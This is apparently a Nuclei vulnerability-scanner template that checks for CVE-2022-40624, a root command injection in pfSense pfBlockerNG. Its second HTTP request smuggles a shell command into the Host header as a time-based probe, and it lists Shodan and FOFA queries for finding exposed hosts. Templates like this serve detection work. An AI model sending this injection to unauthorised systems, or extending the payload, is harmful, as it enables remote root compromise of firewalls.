id: CVE-2022-40624

info:
  name: pfSense pfBlockerNG - OS Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header.
  impact: |
    Allows remote attackers to execute arbitrary code on the affected system.
  remediation: |
    Update to the latest version of pfSense pfBlockerNG to mitigate CVE-2022-40624.
  reference:
    - https://github.com/dhammon/pfBlockerNg-CVE-2022-40624
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40624
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40624
    cwe-id: CWE-78
    epss-score: 0.84655
    epss-percentile: 0.9935
    cpe: cpe:2.3:a:pfsense:pfblockerng:*:*:*:*:*:*:*:*
  metadata:
    vendor: pfsense
    product: pfblockerng
    shodan-query: "pfBlockerNG"
    fofa-query: "pfBlockerNG"
  tags: cve,cve2022,pfsense,pfblockerng,rce,sqli,netgate,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "GIF")'
          - 'contains(content_type, "image/gif")'
        condition: and
        internal: true

  - raw:
      - |+
        @timeout: 20s
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: {{Hostname}}' *; sleep 7; '

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - duration>=7
# digest: 4a0a00473045022077abd7f33cfad020623df9c7b128d8811cc4f6e1c1d5bca0a8f1639d18e58f3f022100aef5a78c882b0bed82fc58de5d3a65a618b01c2a4e9a1fad338f63f4919e699f:922c64590222798bb761d5b6d8e72950